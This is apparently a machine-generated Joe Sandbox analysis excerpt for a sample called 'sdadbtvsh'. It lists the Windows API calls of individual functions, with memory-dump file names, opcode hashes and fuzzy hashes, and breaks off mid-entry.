                                                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 005FCF8A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemMenu$Info_wcslen$Default
                                                                                              • String ID: 0
                                                                                              • API String ID: 1227352736-4108050209
                                                                                              • Opcode ID: baea39646cbded85936abc516bfe78783e05e0580bbf2e357744defa4d2da01c
                                                                                              • Instruction ID: ae46d4d8167b661e1122d2dbdecbaace7f2588dc4fac14628ccec4d547537574
                                                                                              • Opcode Fuzzy Hash: baea39646cbded85936abc516bfe78783e05e0580bbf2e357744defa4d2da01c
                                                                                              • Instruction Fuzzy Hash: 1751E07160430E9BD7249F28CA44ABBBFEABF89314F040A3DFA95D61D0D768D904CB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00624794
                                                                                              • IsMenu.USER32(?), ref: 006247A9
                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006247F1
                                                                                              • DrawMenuBar.USER32 ref: 00624804
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Item$DrawInfoInsert
                                                                                              • String ID: 0
                                                                                              • API String ID: 3076010158-4108050209
                                                                                              • Opcode ID: ba6509228a2eb78d53e5c722889d8fd8904f9389eb7ee8e6e7899592d2c74a6e
                                                                                              • Instruction ID: 4bdc38a80fe8efda0d35b6ec41d401c80f43447b92b5cfce9ea32f392ac2a9fe
                                                                                              • Opcode Fuzzy Hash: ba6509228a2eb78d53e5c722889d8fd8904f9389eb7ee8e6e7899592d2c74a6e
                                                                                              • Instruction Fuzzy Hash: 5F418A75A21A29EFDB20CF50E884AEABBBAFF45314F045129E915A7350CB74ED40CF60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0059B25F: _wcslen.LIBCMT ref: 0059B269
                                                                                                • Part of subcall function 005F4536: GetClassNameW.USER32(?,?,000000FF), ref: 005F4559
                                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 005F26F6
                                                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 005F2709
                                                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 005F2739
                                                                                                • Part of subcall function 005984B7: _wcslen.LIBCMT ref: 005984CA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$_wcslen$ClassName
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 2081771294-1403004172
                                                                                              • Opcode ID: 19c95eb6c85f291b51c6e0225ed1826b472c180040c045430cb42d230581831b
                                                                                              • Instruction ID: 77731d75999f2a394d832c21ebc45ac3545706126ebaf52a6c95f0a30e3d917c
                                                                                              • Opcode Fuzzy Hash: 19c95eb6c85f291b51c6e0225ed1826b472c180040c045430cb42d230581831b
                                                                                              • Instruction Fuzzy Hash: D721E4B1900109ABEF14AB64DC4ACFFBF79FF81760F144119F511A31E1CB7C490A8A10
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,005B50AE,?,?,005B504E,?,006598D8,0000000C,005B51A5,?,00000002), ref: 005B511D
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005B5130
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,005B50AE,?,?,005B504E,?,006598D8,0000000C,005B51A5,?,00000002,00000000), ref: 005B5153
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              • Opcode ID: 1862448e6e5a1e5d2cc0bab39353498fef54c40277cdac44fa387dd85725d7ee
                                                                                              • Instruction ID: 918e3cda6e75de2b1161f58014fc5c88019e59190bac63d77fae847ca377f3ee
                                                                                              • Opcode Fuzzy Hash: 1862448e6e5a1e5d2cc0bab39353498fef54c40277cdac44fa387dd85725d7ee
                                                                                              • Instruction Fuzzy Hash: 7BF06230A00608BBDB259F95DC49BEDBFBAFF44752F055064F805A62A0DB309D51CA91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32 ref: 005EE72B
                                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 005EE73D
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 005EE763
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                              • String ID: GetSystemWow64DirectoryW$X64
                                                                                              • API String ID: 145871493-2590602151
                                                                                              • Opcode ID: 1309f7544a4b983ab7f984da3d88f03d204a22f314d64ccc892bef890eb3fc6d
                                                                                              • Instruction ID: 7b77f54e0c7fd25af8772a8fcda1a72045274f7ae8ba16103f65859416f8ba3f
                                                                                              • Opcode Fuzzy Hash: 1309f7544a4b983ab7f984da3d88f03d204a22f314d64ccc892bef890eb3fc6d
                                                                                              • Instruction Fuzzy Hash: 28F0ED31812AA19FDF7A9B219C8EAAD3A29BF15700F144858E885F2520DB30CC49C695
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,0059637F,?,?,005960AA,?,00000001,?,?,00000000), ref: 0059633E
                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00596350
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,0059637F,?,?,005960AA,?,00000001,?,?,00000000), ref: 00596362
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                              • API String ID: 145871493-3689287502
                                                                                              • Opcode ID: a1fd8075361f0119c832b38f87473fe8a30dd36f7582bcf3974bc7bab9452d0d
                                                                                              • Instruction ID: 9c8d88065919156de847ba3590af83eee0facae693dac196d7298fa6613b058a
                                                                                              • Opcode Fuzzy Hash: a1fd8075361f0119c832b38f87473fe8a30dd36f7582bcf3974bc7bab9452d0d
                                                                                              • Instruction Fuzzy Hash: 94E08C32602F225797222B15AC0DAAA6A1AAF86B27B0A0115F904E3200DFA0CC1AC4B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,005D54C3,?,?,005960AA,?,00000001,?,?,00000000), ref: 00596304
                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00596316
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,005D54C3,?,?,005960AA,?,00000001,?,?,00000000), ref: 00596329
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                              • API String ID: 145871493-1355242751
                                                                                              • Opcode ID: f0ac217bf1f89ee3cc5ba6c86c0bf255fe061c801a68770e71760684716d76fb
                                                                                              • Instruction ID: 20847d40b27dcad8b6bcb59149486e1f66c1c90ace0a5166f5c1428ecc33770c
                                                                                              • Opcode Fuzzy Hash: f0ac217bf1f89ee3cc5ba6c86c0bf255fe061c801a68770e71760684716d76fb
                                                                                              • Instruction Fuzzy Hash: F6D01235642D3157C7322725BC1C9CE7E16EE89B113464415F800A3128DF60CD16C5D1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006034D9
                                                                                              • DeleteFileW.KERNEL32(?), ref: 0060355B
                                                                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00603571
                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00603582
                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00603594
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Delete$Copy
                                                                                              • String ID:
                                                                                              • API String ID: 3226157194-0
                                                                                              • Opcode ID: 0503ccc524d24fff01159c53d88fe7e4f6829a3c433ac5b1e85d0e1ec63f0981
                                                                                              • Instruction ID: 72e6c757297a03bb7ce66136aadcf72d0f906ef1574daa4596c7412e2f620a49
                                                                                              • Opcode Fuzzy Hash: 0503ccc524d24fff01159c53d88fe7e4f6829a3c433ac5b1e85d0e1ec63f0981
                                                                                              • Instruction Fuzzy Hash: 15B15071900129ABDF15DFA4CC89EDFBBBDEF45315F1040AAF509E6281EA31AB458F60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 0061AD86
                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0061AD94
                                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0061ADC7
                                                                                              • CloseHandle.KERNEL32(?), ref: 0061AF9C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                              • String ID:
                                                                                              • API String ID: 3488606520-0
                                                                                              • Opcode ID: f40d5e50acbad0d4d4be22dc778a326946acd33c568567aba31f949ba008611a
                                                                                              • Instruction ID: 92b03817ff6b32315003cdf4e517cdfa84906e063923cfd64f19472eea05db60
                                                                                              • Opcode Fuzzy Hash: f40d5e50acbad0d4d4be22dc778a326946acd33c568567aba31f949ba008611a
                                                                                              • Instruction Fuzzy Hash: 67A18171604701AFD720DF24C89AB6ABBE6AF84720F14885DF5599B392DB70EC41CB82
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0059B25F: _wcslen.LIBCMT ref: 0059B269
                                                                                                • Part of subcall function 0061D2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0061C00D,?,?), ref: 0061D314
                                                                                                • Part of subcall function 0061D2F7: _wcslen.LIBCMT ref: 0061D350
                                                                                                • Part of subcall function 0061D2F7: _wcslen.LIBCMT ref: 0061D3C7
                                                                                                • Part of subcall function 0061D2F7: _wcslen.LIBCMT ref: 0061D3FD
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0061C404
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0061C45F
                                                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0061C4C2
                                                                                              • RegCloseKey.ADVAPI32(?,?), ref: 0061C505
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0061C512
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                              • String ID:
                                                                                              • API String ID: 826366716-0
                                                                                              • Opcode ID: 13b7c8335720de87912696ac3f6e7c7142e8e55c26ab85c71a6542c0c38c9d3f
                                                                                              • Instruction ID: e63afe3172d42d3ffe811fa40864202689626c30b9be879dd8e5ebebe01460d3
                                                                                              • Opcode Fuzzy Hash: 13b7c8335720de87912696ac3f6e7c7142e8e55c26ab85c71a6542c0c38c9d3f
                                                                                              • Instruction Fuzzy Hash: 8E618331208241AFD714DF24C494EBABBE6FF84318F18855CF4598B2A2DB31ED46CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 005FE60C: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,005FD6E2,?), ref: 005FE629
                                                                                                • Part of subcall function 005FE60C: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,005FD6E2,?), ref: 005FE642
                                                                                                • Part of subcall function 005FE9C5: GetFileAttributesW.KERNELBASE(?,005FD755), ref: 005FE9C6
                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 005FEC9F
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 005FECD8
                                                                                              • _wcslen.LIBCMT ref: 005FEE17
                                                                                              • _wcslen.LIBCMT ref: 005FEE2F
                                                                                              • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 005FEE7C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 3183298772-0
                                                                                              • Opcode ID: dece055b4274088c260cc762ab282c337f5c4cd3a69f9861edd42890534eae7c
                                                                                              • Instruction ID: 10a290d01fbdd36ad1e9ef6f37b14e6283396c2b99f57d3a94498b2ef18791df
                                                                                              • Opcode Fuzzy Hash: dece055b4274088c260cc762ab282c337f5c4cd3a69f9861edd42890534eae7c
                                                                                              • Instruction Fuzzy Hash: FC5166B200838A5BD774EB54D8859EB7BECBFC4310F00092EF685D3161EF74A6888756
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free
                                                                                              • String ID:
                                                                                              • API String ID: 269201875-0
                                                                                              • Opcode ID: 5c67b9bde58cd58056550ba15accb965391210d24b7d7f03223cf297328c5091
                                                                                              • Instruction ID: 6ac2a651d45daa0e8fe57a7d5ae05d8e2ffaa11867f96d64e99b109a7aa0450e
                                                                                              • Opcode Fuzzy Hash: 5c67b9bde58cd58056550ba15accb965391210d24b7d7f03223cf297328c5091
                                                                                              • Instruction Fuzzy Hash: 4241C172A002149FDB24DFB8C885F5ABBE6FF88314F1585ACE515EB291D631AD01CB80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetInputState.USER32 ref: 00604225
                                                                                              • TranslateAcceleratorW.USER32(?,00000000,?), ref: 0060427C
                                                                                              • TranslateMessage.USER32(?), ref: 006042A5
                                                                                              • DispatchMessageW.USER32(?), ref: 006042AF
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006042C0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                              • String ID:
                                                                                              • API String ID: 2256411358-0
                                                                                              • Opcode ID: 6cc23211ff09386a5e36e38a90ec0832be17ebc12684f5241787edf610638630
                                                                                              • Instruction ID: 03cdd522e414fa42f16cceaece7fb62c66c74be2f611affed4daa439eac59e94
                                                                                              • Opcode Fuzzy Hash: 6cc23211ff09386a5e36e38a90ec0832be17ebc12684f5241787edf610638630
                                                                                              • Instruction Fuzzy Hash: D631F9B06806429EEB3CCB659D58BF737AAEB01304F04156DE662D32E0DFF49985CB11
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetWindowRect.USER32(?,?), ref: 005F21A5
                                                                                              • PostMessageW.USER32(00000001,00000201,00000001), ref: 005F2251
                                                                                              • Sleep.KERNEL32(00000000,?,?,?), ref: 005F2259
                                                                                              • PostMessageW.USER32(00000001,00000202,00000000), ref: 005F226A
                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?), ref: 005F2272
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePostSleep$RectWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3382505437-0
                                                                                              • Opcode ID: 81424015e9ee4d09a2ab9d033f1d8398fa932baaacab75ce811b62d03c8ae253
                                                                                              • Instruction ID: c8647bd60a0ca0ac58afb1980f3f10bbefd5ffed615b432811d0493020ea409c
                                                                                              • Opcode Fuzzy Hash: 81424015e9ee4d09a2ab9d033f1d8398fa932baaacab75ce811b62d03c8ae253
                                                                                              • Instruction Fuzzy Hash: 6931AFB590021DEFDB14CFA8CD89AEE3BB6FB14315F104225FA25AB2D0C774A954CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 006260A4
                                                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 006260FC
                                                                                              • _wcslen.LIBCMT ref: 0062610E
                                                                                              • _wcslen.LIBCMT ref: 00626119
                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00626175
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 763830540-0
                                                                                              • Opcode ID: 38f18ad6089ce925be05f44753a60df3b859504d7387afe4fad8acbe714e8f94
